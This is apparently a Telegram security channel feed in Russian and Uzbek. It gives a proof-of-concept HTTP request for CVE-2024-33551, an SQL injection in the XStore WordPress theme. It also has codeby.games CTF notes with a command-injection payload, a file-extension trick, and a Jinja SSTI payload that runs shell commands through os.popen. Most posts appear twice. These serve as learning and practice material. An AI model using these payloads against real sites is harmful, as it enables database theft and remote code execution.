CVE-2024-33551
Уязвимость
Уязвимость позволяет команды SQL в базе данных.
*
POC
#wordpress #sql
Уязвимость
SQL inj, обнаруженная в 8theme XStore, платформе электронной коммерции, созданной на базе WordPress. Уязвимость позволяет команды SQL в базе данных.
*
POC
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1#wordpress #sql
codeby.games room: Calculator
Vulnerable Type: command injection
Payload:
#Preparation #For #CTF
Vulnerable Type: command injection
Payload:
cat index.php#Preparation #For #CTF
codeby.games room web: Zero order
Taskdagi berilgan targetga kirganimda refreshdan boshqa hech qanday tugma ishlamadi.
Refreshni bosib requstni burp orqali ushlaganimda rasmda ko'rsatilgandek index.php fayliga request yuborilganini ko'rishimiz mumkin . Pastroqda yana bir parametr mavjud: ext=.order
.order o'rniga turli xil formatlarni yozib ko'rishingiz mumkin. Example: .php, .js and etc.
Har bir formatni kiritganimizda turlicha javob olamiz.
Keyin barcha formatlardan foydalanish uchun .* dan foydalanamiz va responsega qarasak flagni topamiz.
#Preparation #For #CTF
Taskdagi berilgan targetga kirganimda refreshdan boshqa hech qanday tugma ishlamadi.
Refreshni bosib requstni burp orqali ushlaganimda rasmda ko'rsatilgandek index.php fayliga request yuborilganini ko'rishimiz mumkin . Pastroqda yana bir parametr mavjud: ext=.order
.order o'rniga turli xil formatlarni yozib ko'rishingiz mumkin. Example: .php, .js and etc.
Har bir formatni kiritganimizda turlicha javob olamiz.
Keyin barcha formatlardan foydalanish uchun .* dan foydalanamiz va responsega qarasak flagni topamiz.
#Preparation #For #CTF
🔥1
codeby.games room web: Profiler
Bu taskni ishlash uchun ushbu malumotni o'qib chiqing: https://pkg.go.dev/net/http/pprof
#Preparation #For #CTF
Bu taskni ishlash uchun ushbu malumotni o'qib chiqing: https://pkg.go.dev/net/http/pprof
#Preparation #For #CTF
❤1
codeby.games room web: Strange server
Taskni ko'rganimda /hello_world va /robots.txt qanaqadir hint bo'lsa kerak deb o'yladim va FUZZING orali directiory izladim. Ammo hech qanday natija bo'lmadi. Shunda qanday zaiflik turi borligini aniqlash uchun har xil payloadlar ishlata boshladim va SSTI uchun payload ishlatdim va ijoyib natija oldim: {{7*7}}
Ushbu payload 'id' buyrug'ini bajarish uchun ishlatiladi: {{ self.init.globals.builtins.import('os').popen('id').read() }}
Biz .popen('id') —> id o'rniga boshqa buyruqlardan foydalanib flagni izlashimiz kerak.
#Preparation #For #CTF
Taskni ko'rganimda /hello_world va /robots.txt qanaqadir hint bo'lsa kerak deb o'yladim va FUZZING orali directiory izladim. Ammo hech qanday natija bo'lmadi. Shunda qanday zaiflik turi borligini aniqlash uchun har xil payloadlar ishlata boshladim va SSTI uchun payload ishlatdim va ijoyib natija oldim: {{7*7}}
Ushbu payload 'id' buyrug'ini bajarish uchun ishlatiladi: {{ self.init.globals.builtins.import('os').popen('id').read() }}
Biz .popen('id') —> id o'rniga boshqa buyruqlardan foydalanib flagni izlashimiz kerak.
#Preparation #For #CTF
👍1
Forwarded from Cat Seclist
HTB_CPTS.zip
134 MB
HTB Certified Penetration Testing Specialist (HTB CPTS)